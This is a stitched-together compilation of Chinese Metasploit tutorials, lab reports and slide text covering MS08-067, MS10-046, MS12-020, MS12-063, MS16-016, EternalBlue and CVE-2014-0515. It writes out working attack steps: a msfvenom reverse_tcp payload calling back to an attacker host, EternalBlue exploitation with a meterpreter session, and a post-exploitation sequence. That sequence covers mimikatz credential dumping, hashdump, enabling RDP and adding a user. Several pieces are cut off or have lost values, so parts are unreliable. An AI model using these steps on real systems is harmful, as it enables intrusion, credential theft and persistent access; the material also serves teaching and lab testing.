Metasploit实战攻击解析

合集下载

基于Metasploit的MS16-016本地溢出漏洞利用实战

基于Metasploit的MS16-016本地溢出漏洞利用实战

基于Metasploit的MS16-016本地溢出漏洞利用实战作者:赵秋来源:《电脑知识与技术》2018年第31期摘要:该文对MS16-016本地溢出漏洞做了简单介绍,文中分析了利用MS16-016本地溢出漏洞,渗透到Windows 7中并获取系统权限的实现方式,最后给出了对应的防范措施。

关键词: Metasploit;MS16-016;本地溢出漏洞中图分类号:TP393; ; ; 文献标识码:A; ; ; 文章编号:1009-3044(2018)31-0216-011 漏洞介绍MS16-016这个漏洞是由于Windows中的WebDAV未正确处理WebDAV客户端发送的信息导致的。

若要利用此漏洞,攻击者首先必须登录系统。

然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统。

此漏洞存在于在:Windows Vista SP2、Windows Server 2008 x86 & x64、Windows Server 2008 R2 x64、Windows 7 x86 & x64、Windows 8.1 x86 & x64。

系统中提升权限至系统权限,以下系统中导致系统拒绝服务(蓝屏):Windows Server 2012、Windows Server 2012 R2、Windows RT 8.1、Windows 10。

2 MS16-016本地溢出漏洞利用的实现下面介绍在Kali中渗透Windows 7 x86的实现。

Kali的IP地址为10.3.81.106,Windows 7 x86的IP地址为10.3.81.152,使用虚拟机kali 中的Metasploit利用MS16-016本地溢出漏洞对Windows 7的进行渗透,从而获得系统权限。

1)在Kali上生成连接软件msf.exe,LHOST为Kali的IP地址root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.3.81.106 LPORT=4444 -f exe > msf.exe2)在命令行下输入“msfconsole”,进入MSF的启动界面root@kali:~# msfconsole3)在Metasploit命令提示符下,使用use命令载入监听模块。

网络攻击实验报告

网络攻击实验报告

一、实验背景随着互联网技术的飞速发展,网络安全问题日益突出。

为了提高网络安全意识,掌握网络安全防护技能,我们进行了一次网络攻击实验。

本次实验旨在了解网络攻击的基本原理,熟悉常见的网络攻击手段,以及掌握相应的防御措施。

二、实验目的1. 理解网络攻击的基本原理和常见手段。

2. 掌握网络攻击实验的基本流程。

3. 熟悉网络安全防护技术,提高网络安全意识。

三、实验环境1. 操作系统:Windows 102. 网络设备:路由器、交换机、计算机3. 实验软件:Wireshark、Nmap、Metasploit等四、实验内容1. 漏洞扫描(1)使用Nmap扫描目标主机,发现潜在的安全漏洞。

(2)分析扫描结果,了解目标主机的开放端口和服务信息。

2. 拒绝服务攻击(DoS)(1)使用Metasploit生成大量的伪造请求,对目标主机进行DoS攻击。

(2)观察目标主机响应时间,分析攻击效果。

3. 口令破解(1)使用Hydra工具尝试破解目标主机的登录口令。

(2)观察破解过程,了解口令破解的原理。

4. 恶意代码传播(1)利用网络共享传播恶意代码,感染目标主机。

(2)分析恶意代码的传播过程,了解恶意代码的特点。

5. 数据窃取(1)使用网络监听工具,窃取目标主机传输的数据。

(2)分析窃取到的数据,了解数据窃取的原理。

五、实验结果与分析1. 漏洞扫描通过Nmap扫描,我们成功发现目标主机的开放端口和服务信息,发现了一些潜在的安全漏洞。

这为我们进行后续的攻击实验提供了依据。

2. 拒绝服务攻击(DoS)我们使用Metasploit生成了大量的伪造请求,对目标主机进行了DoS攻击。

观察目标主机的响应时间,发现攻击效果明显,目标主机无法正常响应服务。

3. 口令破解我们尝试破解目标主机的登录口令,使用Hydra工具进行暴力破解。

经过一段时间,成功破解了目标主机的口令。

4. 恶意代码传播我们利用网络共享传播恶意代码,成功感染了目标主机。

Metasploit详解详细图文教程

Metasploit详解详细图文教程

Metasploit详解详细图文教程1. 一、metasploit简介Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。

Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。

它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。

这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使Metasploit Framework 成为一种研究高危漏洞的途径。

它集成了各平台上常见的溢出漏洞和流行的shellcode ,并且不断更新。

目前的版本收集了数百个实用的溢出攻击程序及一些辅助工具,让人们使用简单的方法完成安全漏洞检测,即使一个不懂安全的人也可以轻松的使用它。

当然,它并不只是一个简单的收集工具,提供了所有的类和方法,让开发人员使用这些代码方便快速的进行二次开发。

其核心中一小部分由汇编和C语言实现,其余由ruby实现。

不建议修改汇编和C语言部分。

1. 二、搭建metasploit环境Windows环境下安装。

从官方网站/下载windows版本的安装版,直接安装即可。

安装的版本是3.5.1。

安装时需要注意以下两点:1. 在安装的时候要关闭杀毒软件。

否则的话会导致杀毒软件和metasploit冲突,导致安装失败。

2. 在控制面版——区域和语言选项——选择英文(美国)——高级选项卡中选择英文(美国)。

因为在安装的时候,会进行检测,如果属于非英文地区会导致安装失败。

如果安装有杀毒软件,会经常提示在metasploit的安装目录下检测到病毒或木马。

Linux下环境下安装。

官方网站提供了两种Linux下的安装方式,一种是打包好的metasploit安装包,如framework-3.5.1-linux-i686.run,里面包含了安装所需要的各种包,下载后直接在电脑上安装即可。

渗透神器Metasploit

渗透神器Metasploit

渗透神器Metasploit⼀、Metasploit框架介绍Metasploit是⼀个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。

它本⾝附带数千个已知软件漏洞的专业级漏洞攻击⼯具。

当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。

仿佛⼀夜之间,任何⼈都可以成为⿊客,每个⼈都可以使⽤攻击⼯具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。

软件⼚商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队⼀直都在努⼒开发各种攻击⼯具,并将它们贡献给所有Metasploit⽤户。

我们能够通过它发现漏洞并进⾏快速实施攻击,当然需要在授权的情况下⼆、Metasploit模块介绍综合渗透测试框架MSF所⽤功能可分为这⼏个模块,每个模块都有各⾃的功能领域,形成了渗透测试的流程模块名模块名描述Auxiliary辅助模块为渗透测试信息搜集提供了⼤量的辅助模块⽀持Exploits攻击模块利⽤发现的安全漏洞或配置弱点对远程⽬标系统进⾏攻击,从⽽获得对远程⽬标系统访问权的代码组件Payload攻击载荷模块攻击成功后促使靶机运⾏的⼀段植⼊代码Post后渗透攻击模块收集更多信息或进⼀步访问被利⽤的⽬标系统Encoders编码模块将攻击载荷进⾏编码,来绕过防护软件拦截三、MSF-基础指令命令描述help/?帮助菜单exit退出MSF控制台Back返回上⼀级info显⽰⼀个或者多个模块的信息show显⽰所给类型的模块background将当前操作在后台运⾏use使⽤所选择的模块set设置选项unset取消设置的选项session会话use使⽤所选择的模块使⽤MSF前先打开数据库开启数据库:service postgresql start如果不开启数据库也可以,不过关于数据库的命令⽤不了初始化MSF数据库:msfdb init开启MSF:msfconsole查看数据连接状态:db_status常⽤模块讲解Auxiliary 模块: show auxiliaryRank表⽰好⽤级别:normal(正常),excellent(优秀),good(良好),average(平均)命名规则:功能/服务/名称 scanner/smb/smb_ms17_010Exploits 模块: show exploits命名规则:操作系统/服务/名称 windows/smb/ms17_010_eternalbluePayload 模块:show payloads命名规则:操作系统/类型/名称 windows/x64/meterpreter/reverse_tcpMSF搜索模块根据名称搜索 : search ms17_010MSF设置模块设置模块:use auxiliary/scanner/smb/smb_ms17_010查看选项:options四、MSF攻击流程Ping下需要攻击的⽬标地址 ping 192.168.2.168指定ping四次 ping 192.168.2.168 -c 4扫描⽬标地址端⼝有没有开启,永恒之蓝端⼝445,⽂件共享服务端⼝db_nmap 192.168.2.168 -p 445,-p指定445端⼝发现⽬标机器开启了445端⼝,查看hosts,发现⽬标地址已经存在这⾥了搜索下永恒之蓝模块名字search ms17_010使⽤辅助模块来扫描,看到了SMB REC,扫描下看有没有远程命令执⾏漏洞use auxiliary/scanner/smb/smb_ms17_010options,查看需要设置什么,⼀般都是设置yes需要设置⼀个路径,这个路径就是字典⽂件,MSF已经设置好了,所以不需要设置RHOSTS⽬标服务器地址,远程主机的地址,需要设置成⽬标地址⽬标端⼝SMB线程⽤户名和密码都是不需要设置的,因为MSF利⽤远程命令执⾏这个漏洞去攻击设置RHOSTS,最简单就是set rhosts 192.168.2.168也可以利⽤hosts扫描到的数据库⾥⾯有的,直接hosts -R也可以使⽤run或者exploit都是可以攻击的发现了绿⾊的[+],说明可能存在MS17-010 漏洞的,同时也看到这台⽬标服务器的相关资料,操作系统是windows server 2008 R2 64位的,MSF⾃带的只能攻击64位的接下来使⽤攻击模块search ms17发现有两个攻击模块可以使⽤,这⾥使⽤⼀个ms17_010_eternalblue直接use 8,进⼊到攻击模块设置payload,先查看show payloads反向连接tcp,因为不知道服务器有没有⽹使⽤meterpreterset payload windows/x64/meterpreter/reverse_tcpoptions 查看下还要设置什么需要设置本机ip地址和⽬标地址set lhost 192.168.2.250set rhosts 192.168.2.168设置好后现在就可以直接攻击了rungetuid查看下成功没拿到了SYSTEM的权限,NT是windowsshell看看,进⼊⽬标机器的CMD命令load mimikatz ,加载mimikatzkerberos,读取⽬标机器⽤户的凭证,明⽂密码background,把会话放在后台db_nmap 192.168.2.168 -p 3389,扫描下端⼝,看能不能远程登录端⼝没开启,使⽤post模块,通过修改注册表来开启⽬标端⼝search enable_rdp,rdp表⽰远程登录服务use 0options,看需要设置什么在system权限上,把⽬标的3389转发到本地的3389,再通过3389连接,可以新建账户密码,session就是我们刚刚保留的会话,通过这个会话开启服务器⽬标的端⼝和⽤户名和密码set password 1234.aset session 1set username abcrun,攻击下db_nmap 192.168.2.168 -p 3389,扫描下看开放没rdesktop 192.168.2.168,远程登录五、后渗透⼯具 - meterpreter查看⽤户权限: meterpreter> getuid获取hash密码: meterpreter> hashdump上传⽂件: meterpreter> upload执⾏⽂件: meterpreter> execute -f notepad.exe获取屏幕截图:meterpreter>screenshot获取shell:meterpreter>shell声明:请勿⽤作违法⽤途,请在授权情况下使⽤。

基于Metasploit的攻防实验

基于Metasploit的攻防实验

基于Metasploit的攻防实验本次实验的目的,是通过Metasploit的攻击过程,对远程缓冲区溢出获取系统权限有一个感性的认识,包括MSF的使用方法,攻击的必要步骤、效果和被攻击系统观察到的现象。

实验环境:建议:攻击机(BT5)、HoneyWall、靶机(Linux_target)最低要求:攻击机,靶机。

在最低要求下,需要把攻击机和靶机都放在一个虚拟机的VLAN中,NAT或Host都可以。

MetasploitMetasploit是的一个集成了多种工具的攻击工具集合,主要用途是进行远程缓冲区溢出实验。

进入Metasploit进入BT5系统,登陆后输入 startx,进入图形界面。

在图形界面,点击terminal图标,进入终端界面在终端界面输入 msfconsole,进入metasploit的控制台,第一次进入会比较慢。

扫描靶机,发现可选择的漏洞在msf的控制台下输入nmap –sS –A –P0 靶机IP地址探测靶机存在的服务及版本,目前我们的靶机存在的服务比较多包括Apache,Tomcat,Samba,distcc,Mysql等等。

这些服务是稍后选择攻击种类的依据。

使用Metasploitmsf进行攻击包括三个步骤,选择对应的服务漏洞、选择攻击负载,选择攻击参数。

选择对应的服务漏洞例我们选择希望选择攻击samba服务的漏洞,首先在控制台输入 search s amba,查找msf目前支持的攻击samba漏洞的代码有哪些,msf会给出一系列针对不同平台不同版本的Samba服务攻击代码,一般越新的代码越有效,越老的代码,由于系统可能已经打了补丁或者升级,会不能攻击成功。

同时注意选择攻击的平台是Linux\Windows\OSX还是多平台(multi)我们在这个选择一个multi,在msf控制台下输入use e xploit/multi/samba/usermap_script此时我们进入了该攻击代码的子菜单,如果要更换攻击代码,输入 back返回上一级控制台菜单。

metasploit渗透实战

metasploit渗透实战

metasploit 渗透实战2021-11-01 13:07:58| 分类:个人日记|举报|字号订阅作为一个知名的渗透测试框架,metasploit集成了几乎所有的入侵渗透工具,其壮大的功能让人叹为观止。

慢慢的发掘,你会喜欢上他的今天我要给大家演示的就是如安在metasploit做入侵渗透测试,从大体的信息搜集,到入侵,到内部渗透,所有的这一切都在metasploit中完成。

首先咱们更新metasploit到最新版本[email=root@ubuntu:/pentest/exploits/framework3]root@ubuntu:/pentest/exploits/ framework3[/email]# svn updateA modules/exploits/windows/browser/版本6609。

已是最新版本,启动framewokr3[email=root@ubuntu:/pentest/exploits/framework3]root@ubuntu:/pentest/exploits/ framework3[/email]# ./msfconsole| | _) |__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|| | | __/ | ( |\__ \ | | | ( | | |_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|_|=[ msf+ -- --=[ 376 exploits - 234 payloads+ -- --=[ 20 encoders - 7 nops=[ 153 auxmsf >肯定目标以后,首先我们要收集信息,比如DNS查询,服务器类型查询,端口开放信息查询,我们进行如下操作,至于为何这样,后面再做解释msf > load db_wmap[*] =[ WMAP - ET LoWNOISE[*] Successfully loaded plugin: db_wmapmsf > db_driver[*] Active Driver: sqlite3[*] Available: sqlite3, mysqlmsf > load db_sqlite3[-][-] The functionality previously provided by this plugin has been[-] integrated into the core command set. Use the new 'db_driver'[-] command to use a database driver other than sqlite3 (which[-] is now the default). All of the old commands are the same.[-][-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Depr ecated pluginmsf > db_connect pentest[*] Successfully connected to the database[*] File: pentest接下来,我们查询目标主机iPmsf > nslookup[*] exec: nslookupServer:Address: #53Non-authoritative answer:canonical name =Name:Address:剩下的就是收集开放端口和服务信息,因为在metasploit里面有多种信息收集方式,出于个人习惯,我利用nmap,同时检测是不是存在sqlinject漏洞,我们执行msf > db_nmap -sV -P0 -O --script=[*] exec: "/usr/bin/nmap" "-sV" "-P0" "-O" "" "--script=" "-oX" "/tmp/dbnmap-28001 -njyqqa-0"NMAP:NMAP: Starting Nmap ( ) at 2021-06-02 03:14 CSTSCRIPT ENGINE: '/usr/share/nmap/scripts/' threw a run time error and could not be l oaded.SCRIPT ENGINE: '/usr/share/nmap/scripts/' threw a run time error and could not be l oaded.SCRIPT ENGINE: '/usr/share/nmap/scripts/' threw a run time error and could not be lNMAP: Interesting ports on :NMAP: Not shown: 996 filtered portsNMAP: PORT STATE SERVICE VERSIONNMAP: 21/tcp open ftp Serv-U ftpdNMAP: 53/tcp open domain Microsoft DNSNMAP: 80/tcp open http Microsoft IIS webserverNMAP: 443/tcp closed httpsNMAP: Device type: general purposeNMAP: Running (JUST GUESSING) : Microsoft Windows 2021|2000|XP (98%) NMAP: Aggressive OS guesses: Microsoft Windows Server 2003 SP2 (98%), Microsof t Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows 2000 SP4 (93%), Micro soft Windows XP Home SP2 (Russian) (93%), Microsoft Windows XP SP2 (93%), Micr osoft Windows Server 2003 SP1 (92%), Microsoft Windows 2000 Server SP4 (90%), M icrosoft Windows Server 2003 SP0 or Windows XP SP2 (90%), Microsoft Windows Se rver 2003 Enterprise Edition SP2 (88%), Microsoft Windows XP Professional SP2 (Fre nch) (88%)NMAP: No exact OS matches for host (test conditions non-ideal).NMAP: Service Info: OS: WindowsNMAP:NMAP: OS and Service detection performed. Please report any incorrect results at su bmit/ .NMAP: Nmap done: 1 IP address (1 host up) scanned in seconds未检测出sql注射漏洞,通过扫描我们发现目标主机开放了ftp服务,DNS服务,IIS服务,判断出操作系统是windows server 2003.因为DNS出现了远程堆栈溢出,我们首先尝试对目标机器进行溢出,执行如下操作。

网络空间安全技术实践教程 14.3课件

Kali Linux 有MS08-067漏洞的Windows XP(靶机)
网络空间安全技术实践教程
7
14.3 Metasploit攻击实验
实验步骤: (1)根据扫描阶段搜集到的信息,选取漏洞 进行利用。以Windows XP系统的MS08-067 漏洞为例:
网络空间安全技术实践教程
8
14.3 Metasploit攻击实验
网络空间安全技术实践教程
第四篇 渗透攻击测试实验篇
第十四章 漏洞利用实验
14.3 Metasploit攻击实验
网络空间安全技术实践教程
2
14.3 Metasploit攻击实验
实验目的: 熟练掌握Metasploit渗透测试框架的使 用,能使用Metasploit独立完成一次漏洞利用 过程。
网络空间安全技术实践教程
实验步骤: (2)终端输入 “msfconsole” 打开MSF的命 令行交互界面。
网络空间安全技术实践教程
9
14.3 Metasploit攻击实验
实验步骤: (3)搜索漏洞攻击程序: msf > search ms08-067
网络空间安全技术实践教程
10
14.3 Metasploit攻击实验
实验步骤: (4)选择合适的漏洞攻击程序:
网络空间安全技术实践教程
19
17
14.3 Metasploit攻击实验
实验扩展要求:
尝试熟练使用Metasploit的各个功能模块,完 成对Windows和Linux系统一些常见漏洞的利用 过程 学习自动化漏洞扫描和利用工具Armitage的使 用
网络空间安全技术实践教程
18
14.3 Metasploit攻击实验

实验三kali下metasploit的漏洞攻击实践

实验三kali下metasploit的漏洞攻击实践⼀、实验内容1.使⽤kali进⾏靶机的漏洞扫描,利⽤metasploit选择其中的⼀个漏洞进⾏攻击,并获取权限。

2.分析攻击的原理以及获取了什么样的权限。

⼆、实验要求1.熟悉kali原理和使⽤⽅法。

2.认真操作,详细记录实验过程和实验结果。

三、实验⼯具笔记本电脑⼀台,安装parallels desktop虚拟机,安装kali和靶机系统windows10。

另外安装了vmware虚拟机,安装kali和靶机系统windows2000。

四、实验步骤(⼀)pd虚拟机下搭建渗透测试环境1.在pd虚拟机下安装kali攻击机系统以及windows10靶机系统。

Kali是⼀个linux系统,Kali Linux预装了许多渗透测试软件,包括nmap (端⼝扫描器)、Wireshark (数据包分析器)、John the Ripper (密码破解器),以及Aircrack-ng (⼀应⽤于对⽆线局域⽹进⾏渗透测试的软件).⽤户可通过硬盘、live CD或live USB运⾏Kali Linux。

Metasploit的Metasploit Framework⽀持Kali Linux,Metasploit⼀套针对远程主机进⾏开发和执⾏Exploit代码的⼯具。

2.在parallels desktop中设置两台虚拟机⽹络为共享⽹络模式(若是vmware虚拟机则是nat模式),⾃动分配IP地址,之后两台虚拟机就可以直接ping通。

(1)靶机ip地址获取:在cmd中输⼊ipconfig,获取ip地址为10.211.55.3。

(2)攻击机ip地址获取:在shell中输⼊ifconfig,获取ip地址为10.211.55.4。

(3)可见,两台虚拟机处于同⼀⽹段下,可以互相ping通。

⼀般来说在unix或linux系统中会⼀直ping下去,这时按快捷键Ctrl+Z或Ctrl+C均可停⽌ping。

使用Metasploit进行网络渗透测试和漏洞攻击的教程

使用Metasploit进行网络渗透测试和漏洞攻击的教程第一章:网络渗透测试的概念和重要性网络渗透测试是一种用于评估系统或应用程序安全性的方法,它模拟了黑客攻击的过程,以便发现系统中潜在的安全漏洞和薄弱点。

通过进行网络渗透测试,组织可以及早发现并修复这些漏洞,从而增强自身的安全性。

第二章:介绍Metasploit框架Metasploit是一个功能强大的开源渗透测试框架,它提供了一系列的工具和资源,帮助渗透测试人员和安全研究人员发现和利用系统中的安全漏洞。

Metasploit拥有广泛的漏洞利用模块和payloads,可以帮助用户快速进行渗透测试并获取系统的控制权限。

第三章:安装和配置Metasploit框架要使用Metasploit框架,首先需要将其安装在我们的操作系统中。

Metasploit框架可以在Windows、Linux和Mac OS等多个平台上运行。

在安装之前,我们需要先安装Ruby解释器和一些必要的依赖项,然后下载Metasploit框架的安装包,并按照提示进行安装和配置。

第四章:信息收集和扫描在进行网络渗透测试之前,我们需要对目标系统进行详细的信息收集和扫描,以便找到可利用的漏洞。

Metasploit提供了一些常用的信息收集和扫描工具,如Nmap和Nessus。

通过这些工具,我们可以获取目标系统的IP地址、开放的端口和运行的服务等信息,并对其进行漏洞扫描。

第五章:漏洞利用当我们发现了目标系统的漏洞后,就可以使用Metasploit框架提供的漏洞利用模块对其进行攻击。

Metasploit拥有大量的漏洞利用模块,包括针对操作系统、网络服务和应用程序的各种漏洞利用。

我们可以根据目标系统的信息选择合适的漏洞利用模块,并按照指引设置payload和目标参数,然后启动攻击。

第六章:权限提升和持久化一旦我们成功地获取了目标系统的控制权限,就可以进行一些提权和持久化操作,以便长期控制该系统。

Metasploit提供了一些用于提升权限和持久化的模块和技术,如UAC绕过、Hashdump 和后门程序等。

溢出攻击---Metasploit介绍汇总

MSF编码器
在网络中明文传输的shellcode很可能被入侵检测系统和杀毒软件所识别 ,为了解决这一问题,Metasploit的开发者提供了MSF编码器,用来通过对 原始攻击载荷进行编码,来避免坏字符,以及逃避杀毒软件和IDS的检测。
Metasploit下一个Excelllent等级的编码器x86/shikata_ga_nai编码器
• Use <exploit name>(使用漏洞) • Set <OPTION NAME><option>(设置选项) • Exploit 开始漏洞攻击
14
目录
➢第一章 Metasploit基础 ➢第二章 Metasploit常用命令 ➢第三章 Metasploit高级应用
15
Meterpreter基础
• Metasploit的第一版是发布2003年10月,主要是基于Perl语言,集成了 11个渗透攻击模块。2004年4月发布了Metasploit 2.0,这个版本包含 了19个渗透攻击模块和超过27个攻击载荷。2007年发布了Metasploit 3.0,这个版本使用Ruby语言。
• 2009年秋季,Metasploit被漏洞扫描领域的一家领军企业Rapid7收购。 Rapid7在Metasploit上发布了两款版本:Metasploit Express和Metasploit Pro。Metasploit Express是一个带有GUI界面的轻量级Metasploit框架软 件。Metasploit Pro是Metasploit Express的扩展版本。
17
Screenshot
Screenshot(截屏)
Meterpreter的screenshot命令可以获取活动用户的桌面截屏。如果是 Windows系统则截屏保存到c:\metasploit\msf3目录下。
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点 击LNK文件与点击快捷方式所指定的目标具有相同的效果。Windows没有正确地 处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定 的代码。这些代码可能位于USB驱动、本地或远程文件系统、光驱或其他位置, 使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。
Metasploit实战攻击 作者:zhoumo_108
MS08-067漏洞攻击 MS10-046漏洞攻击 MS12-020漏洞攻击 MS12-063漏洞攻击 CVE-2014-0515漏洞攻击
1
MS08-067漏洞攻击
漏洞描述:
Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067) Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻 击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统, SYSTEM权限执行任意指令。
15
实战过程
16
17
MS08-067漏洞攻击 MS10-046漏洞攻击 MS12-020漏洞攻击 MS12-063漏洞攻击 CVE-2014-0515漏洞攻击
18
MS12-063漏洞攻击
漏洞描述:
Microsoft IE execCommand函数释放后重用漏洞(MS12-063)
受影响系统: Microsoft Internet Explorer 9.x Microsoft Internet Explorer 8.x Microsoft Internet Explorer 7.x
对于Windows 2000、XP和Server 2003,无需认证便可以利用这个漏洞 对于Windows Vista和Server 2008,可能需要进行认证。
2
实战过程
3
4
5
6
MS08-067漏洞攻击 MS10-046漏洞攻击 MS12-020漏洞攻击 MS12-063漏洞攻击 CVE-2014-0515漏洞攻击
受影响系统:
Adobe Flash Player 13.0.0.182 for windows Adobe Flash Player 13.0.0.201 for Mac Adobe Flash Player 11.2.202.350 for Linux
26
实战过程
27
28
29
19
实战过程
20
21
22
23
24
Hale Waihona Puke MS08-067漏洞攻击 MS10-046漏洞攻击 MS12-020漏洞攻击 MS12-063漏洞攻击 CVE-2014-0515漏洞攻击
25
CVE 2014-0515
漏洞描述:
Adobe Flash Player是一款Flash文件处理程序。Adobe Flash Player存在一个未 明缓冲区溢出漏洞,允许攻击者构建恶意swf,诱使用户解析,可使应用程序崩溃 或以应用程序上下文执行任意代码。
远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-Channel) 的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机电脑(服务器端或称 “远程电脑”).Windows在处理某些对象时存在错误,可通过特制的RDP报文访问 未初始化的或已经删除的对象,导致任意代码执行,然后控制系统。
8
实战过程
9
10
客户端
11
12
13
MS08-067漏洞攻击 MS10-046漏洞攻击 MS12-020漏洞攻击 MS12-063漏洞攻击 CVE-2014-0515漏洞攻击
14
MS12-020漏洞攻击
漏洞描述:
Microsoft远程桌面协议RDP远程代码执行漏洞(MS12-020)
受影响系统: Microsoft Windows XP Professional Microsoft Windows XP Home Microsoft Windows Server 2003 Standard Edition Microsoft Windows Server 2003 Enterprise Edition Microsoft Windows Server 2003 Datacenter Edition Microsoft Windows 7
7
MS10-046漏洞攻击
漏洞描述:
Microsoft Windows快捷方式LNK文件自动执行代码漏洞(MS10-046)
受影响系统: Microsoft Windows XP SP3 Microsoft Windows XP SP2 Microsoft Windows Vista SP2 Microsoft Windows Vista SP1 Microsoft Windows Server 2008 R2 Microsoft Windows Server 2003 SP2 Microsoft Windows 7
Microsoft Internet Explorer是微软公司推出的一款网页浏览器,使用相当 广泛。IE的execCommand函数在实现上存在释放后重用漏洞,远程攻击者 可能利用此漏洞通过诱使用户访问恶意网页执行挂马攻击,控制用户系统。 该函数在执行一个命令时,会先触发相应的事件函数,恶意攻击者可在事件 函数中重写html页面,致使某个对象被释放掉,但此时execCommand的操 作还没完成,这就导致了释放后重用漏洞。攻击者通过精心构造的页面,并 诱使受害用户访问,就可以达到在受害用户系统中执行任意指令的目的。
相关文档
最新文档